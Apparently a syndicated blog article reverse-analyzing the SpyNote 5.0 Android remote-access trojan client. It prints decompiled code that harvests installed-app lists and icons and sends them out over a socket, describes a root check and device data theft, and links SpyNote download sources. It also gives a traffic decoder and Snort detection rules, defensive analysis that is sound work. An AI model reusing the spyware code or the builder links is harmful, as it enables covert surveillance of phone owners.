2025-01-23 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
Today I would like to walk through how to reverse-analyze the SpyNote5.0 Client_APK, a topic many people know little about. To make it easier to follow, the editor has summarized the content below. I hope you take something away from this article.
1. What is SpyNote5.0?
SpyNote is a tool used to build Android malware. Its feature list is eye-catching: reading contacts, audio recording, command execution, application management, keystroke logging, GPS location, and so on. These capabilities make it a useful bridge for studying Android malware. A preliminary understanding of how it is used can be gained from a series of earlier articles: "SpyNote v5.0 graphical tool: a tutorial on remotely managing Android phones", "Be careful, the Android Trojan tool SpyNote is free! Remote monitoring is that simple", "Be careful, the Android remote-control tool (SpyNote) has been upgraded", and others.
2. Prepare the tools
Few people have written about reverse analysis of the SpyNote5.0 Client_APK, so let me briefly introduce the tools used, and then move on to the reverse analysis itself.
1. SpyNote5.0
Download address: https://github.com/soDLL/SpyNote or https://github.com/miladzero/SpyNote
2. jadx-gui
Download address: https://github.com/skylot/jadx/releases
3. androidkiller
Download address: https://www.guguzhu.com/soft/270509.html
3. Start reverse analysis
We begin the analysis of Client_APK by dragging the APK generated by the client into androidkiller, as is usual. Once the file is loaded, androidkiller disassembles it automatically and then presents the analysis results.
On the left, androidkiller groups Activity, Receiver and Service components and the requested application permissions (uses-permission) according to their inheritance relationships, and it is obvious that the client requests a large number of permissions. On the right is the smali assembly window and workbench. The tool makes the permissions and the various inheritance relationships clear, but its version is fairly old and its code recovery is imperfect, so I switched to jadx-gui, imported Client_APK, and continued the reverse analysis there.
We can see three packages: android.support, con.eset.ems2.gp and yps.eton.application. android.support is the Android support library (the v4 and v7 compatibility packages); con.eset.ems2.gp is the configuration package and holds the host, client_name and other settings; yps.eton.application is the package we need to analyze.
Opening yps.eton.application, we see 14 classes. Since there is a lot of code to go through, the analysis below targets only the key parts.
From the earlier androidkiller structure view we can see that classes A, F, G and k extend Service; in Android, a Service is a component that keeps running in the background. So what in Client_APK might need to run continuously? Most likely the key objects that keep running, stay under control, monitor the device, run multiple threads, and so on. Our analysis focuses on some of these functions and on how to identify the client's traffic.
3.1 Command execution startup analysis
Let's start with class A, which starts the service. It iterates over the R object, takes the third element and, if it equals 1, executes j(); otherwise it checks whether a() has already been instantiated and then starts the service. After that it goes on to check, via j(), whether root permission is available.
Looking further at j(): after running the su command, j() writes the string "Do I have root?" to the file /system/sd/temporary.txt, and whether that write succeeds is how it decides if it has root permission.
Then look at h(), which uses a separate thread to read the configuration parameters stored in the R object and sends information back over a socket in a loop.
3.2 Functional analysis of the Base64-encoded application list
Looking at the import list of class A, I noticed that android.util.Base64 is included, which indicates that Base64 encoding is used at runtime. Searching for the keyword Base64 shows that what is Base64-encoded is ((BitmapDrawable) applicationIcon).getBitmap(), that is, the application icon. The client terminates each piece of transmitted information with 9xf89fff9xf89, separates the fields with c0c1c3a2c0c1c, and uses fxf0x4x4x0fxf to separate the command name (and exception reports) from the transmitted data.
    public void k() {
        new Thread(new Runnable() {
            public void run() {
                String str;
                try {
                    StringBuffer stringBuffer = new StringBuffer();
                    PackageManager packageManager = A.this.getApplicationContext().getPackageManager();
                    // Enumerate every installed application that has a launcher intent
                    for (ApplicationInfo applicationInfo : packageManager.getInstalledApplications(0)) {
                        if (packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null
                                && !packageManager.getLaunchIntentForPackage(applicationInfo.packageName).equals("")) {
                            try {
                                Date date = new Date(packageManager.getPackageInfo(applicationInfo.packageName, 4096).firstInstallTime);
                                // flags & 1 is FLAG_SYSTEM: "system" app versus "user" app
                                String str2 = packageManager.getLaunchIntentForPackage(applicationInfo.packageName) != null
                                        ? ((applicationInfo.flags & 1) == 1 ? "system" : "user") : "";
                                Drawable applicationIcon = packageManager.getApplicationIcon(applicationInfo.packageName);
                                String str3 = new String();
                                if (applicationIcon != null) {
                                    // The icon is JPEG-compressed and Base64-encoded (flag 2 == Base64.NO_WRAP)
                                    Bitmap bitmap = ((BitmapDrawable) applicationIcon).getBitmap();
                                    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
                                    bitmap.compress(CompressFormat.JPEG, 50, byteArrayOutputStream);
                                    str = Base64.encodeToString(byteArrayOutputStream.toByteArray(), 2);
                                } else {
                                    str = str3;
                                }
                                // Fields are joined with c0c1c3a2c0c1c and each record ends with 9xf89fff9xf89
                                stringBuffer.append(packageManager.getApplicationLabel(applicationInfo) + "c0c1c3a2c0c1c"
                                        + applicationInfo.packageName + "c0c1c3a2c0c1c" + str + "c0c1c3a2c0c1c" + str2
                                        + "c0c1c3a2c0c1c" + date.toString() + "c0c1c3a2c0c1c" + A.this.getPackageName()
                                        + "9xf89fff9xf89");
                            } catch (NameNotFoundException e) {
                                A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" + e.getMessage().toString());
                            }
                        }
                    }
                    // h() sends the assembled list back to the controller over the socket
                    A.this.h("applicationsfxf0x4x4x0fxf" + stringBuffer.toString());
                } catch (Exception e2) {
                    A.this.h("applicationsfxf0x4x4x0fxf[My/Exception]" + e2.getMessage().toString());
                }
            }
        }).start();
    }
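To make the wire format of this message concrete for anyone inspecting a capture, here is an added Python decoder. It is not code from the original article or from SpyNote; it only reuses the three delimiter strings and the "[My/Exception]" prefix visible in k() above. The sample message is constructed, not captured traffic, and its package names, dates and the fake icon bytes are made up.

```python
import base64
from dataclasses import dataclass
from typing import Dict, List, Optional

# Delimiters taken from the decompiled k() method above.
CMD_SEP = "fxf0x4x4x0fxf"     # separates the command name from its payload
FIELD_SEP = "c0c1c3a2c0c1c"   # separates the fields of one application record
RECORD_SEP = "9xf89fff9xf89"  # terminates each application record
ERROR_TAG = "[My/Exception]"  # prefix the client uses when it reports an exception


@dataclass
class AppRecord:
    label: str
    package: str
    icon: Optional[bytes]  # decoded JPEG bytes, None when the client sent no icon
    kind: str              # "system" or "user" (applicationInfo.flags & FLAG_SYSTEM)
    first_install: str     # Date.toString() output, kept verbatim
    client_package: str    # package name of the SpyNote client itself


def split_command(message: str):
    """Return (command, payload); command is None if the message has no separator."""
    if CMD_SEP not in message:
        return None, message
    command, payload = message.split(CMD_SEP, 1)
    return command, payload


def parse_applications(payload: str) -> List[AppRecord]:
    """Decode the record list built by k(): six fields per record, NO_WRAP base64 icon."""
    records = []
    for raw in payload.split(RECORD_SEP):
        if not raw:
            continue  # empty piece after the final record terminator
        fields = raw.split(FIELD_SEP)
        if len(fields) != 6:
            raise ValueError(f"expected 6 fields, got {len(fields)} in {raw[:40]!r}")
        label, package, icon_b64, kind, installed, client_pkg = fields
        icon = base64.b64decode(icon_b64) if icon_b64 else None
        records.append(AppRecord(label, package, icon, kind, installed, client_pkg))
    return records


def decode_message(message: str) -> Dict[str, object]:
    """Classify one client message: command name, error text (if any) and parsed records."""
    command, payload = split_command(message)
    result: Dict[str, object] = {"command": command, "error": None, "records": []}
    if command is None:
        return result
    if payload.startswith(ERROR_TAG):
        result["error"] = payload[len(ERROR_TAG):]
        return result
    if command == "applications":
        result["records"] = parse_applications(payload)
    return result


def build_sample_message() -> str:
    """Constructed sample in the layout k() produces; not real captured traffic."""
    fake_icon = base64.b64encode(b"\xff\xd8\xff\xe0not-a-real-jpeg").decode()
    settings = FIELD_SEP.join(["Settings", "com.android.settings", fake_icon, "system",
                               "Thu Jan 01 00:00:00 GMT 1970", "yps.eton.application"])
    notes = FIELD_SEP.join(["Notes", "com.example.notes", "", "user",
                            "Mon Mar 04 10:11:12 GMT 2019", "yps.eton.application"])
    return "applications" + CMD_SEP + settings + RECORD_SEP + notes + RECORD_SEP


if __name__ == "__main__":
    for rec in decode_message(build_sample_message())["records"]:
        size = len(rec.icon) if rec.icon else 0
        print(f"{rec.kind:6} {rec.package:24} icon={size} bytes")
```

Because the client applies no encryption, a decoder like this recovers the full application inventory from a capture, which is useful during incident response to learn exactly what was exfiltrated.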
3.3 Functional analysis of information gathering
Method b is the longest method in class A; it contains so many switch/case branches that the decompiler raises exceptions on it. From the comments it is easy to see that most of the information-gathering logic lives here: Device info, System info, Sim info, WIFI info and so on, matching the features the tool advertises.
The other variant of method b, which retrieves the storage path, also deserves attention. Path information is transmitted with the delimiter e1x1114x61114e, and file name information with the delimiter -1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c. With these strings, the client's transmissions can be identified more precisely.
4. Summary
How each feature is implemented can be seen during the analysis. The client transmits data unencrypted, only Base64-encoded, and the most conspicuous markers are its delimiter strings. These allow the client's transmissions to be recognized automatically, so we capture packets during a transmission.
The delimiters and the Base64 encoding are clearly visible in the figure. Based on them we can write Snort rules to identify the traffic; an example rule:
alert tcp any any -> any any (msg:"SpyNote5.0 Client"; content:"fxf0x4x4x0fxf"; sid:1; rev:1;)
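As an added example that is not part of the original article and not a Snort configuration, the following Python script expresses the same kind of content matches as small rule objects, renders them in Snort rule syntax, and runs them over constructed TCP segments. It also shows why the sensor needs stream reassembly: a delimiter split across two segments is missed when each packet is matched on its own but caught once the flow is reassembled. The sids, rule messages, flow addresses and payloads are constructed; only the content strings come from the analysis above.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Rule:
    sid: int
    msg: str
    content: bytes


# Content strings are the delimiters identified above; sids and messages are constructed.
RULES: List[Rule] = [
    Rule(1000001, "SpyNote5.0 Client command separator", b"fxf0x4x4x0fxf"),
    Rule(1000002, "SpyNote5.0 Client application record terminator", b"9xf89fff9xf89"),
    Rule(1000003, "SpyNote5.0 Client field separator", b"c0c1c3a2c0c1c"),
    Rule(1000004, "SpyNote5.0 Client path separator", b"e1x1114x61114e"),
]


def to_snort(rule: Rule) -> str:
    """Render a rule in Snort text syntax (quoted msg and content, sid and rev present)."""
    return (f'alert tcp any any -> any any (msg:"{rule.msg}"; '
            f'content:"{rule.content.decode()}"; sid:{rule.sid}; rev:1;)')


def match_rules(payload: bytes, rules: List[Rule] = RULES) -> List[Rule]:
    """Plain substring match, the semantics of a Snort content: option without modifiers."""
    return [r for r in rules if r.content in payload]


Segment = Tuple[str, bytes]  # (flow id such as "src:port->dst:port", TCP payload)


def alerts_per_packet(segments: List[Segment]) -> List[Tuple[str, int]]:
    """Match each segment on its own, as a sensor without stream reassembly would."""
    return [(flow, r.sid) for flow, payload in segments for r in match_rules(payload)]


def alerts_per_flow(segments: List[Segment]) -> List[Tuple[str, int]]:
    """Reassemble each flow first, so a delimiter split across segments is still seen."""
    buffers: Dict[str, bytes] = defaultdict(bytes)
    for flow, payload in segments:
        buffers[flow] += payload
    return [(flow, r.sid) for flow, data in buffers.items() for r in match_rules(data)]


# Constructed segments, not real captures: one application-list message split in two,
# one benign HTTP upload that carries base64 but no delimiter, and one message whose
# command separator straddles a segment boundary.
SAMPLE_SEGMENTS: List[Segment] = [
    ("10.0.0.5:41234->203.0.113.7:1337",
     b"applicationsfxf0x4x4x0fxfSettingsc0c1c3a2c0c1ccom.android.settings"),
    ("10.0.0.5:41234->203.0.113.7:1337",
     b"c0c1c3a2c0c1c/9j/4AAQSkZJRg==c0c1c3a2c0c1csystem9xf89fff9xf89"),
    ("10.0.0.9:50000->198.51.100.2:80",
     b"POST /upload HTTP/1.1\r\n\r\ndGhpcyBpcyBiZW5pZ24="),
    ("10.0.0.5:41235->203.0.113.7:1337", b"applicationsfxf0x4x"),
    ("10.0.0.5:41235->203.0.113.7:1337", b"4x0fxf[My/Exception]timeout"),
]


if __name__ == "__main__":
    for rule in RULES:
        print(to_snort(rule))
    print("per packet:", alerts_per_packet(SAMPLE_SEGMENTS))
    print("per flow:  ", alerts_per_flow(SAMPLE_SEGMENTS))
```

Matching on the delimiters rather than on "looks like Base64" keeps the benign upload quiet, and the reassembled view is what a Snort deployment with the stream preprocessor enabled effectively sees.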
After reading the above, do you have a better understanding of how to reverse-analyze the SpyNote5.0 Client_APK? If you would like to learn more, please follow the industry information channel. Thank you for your support.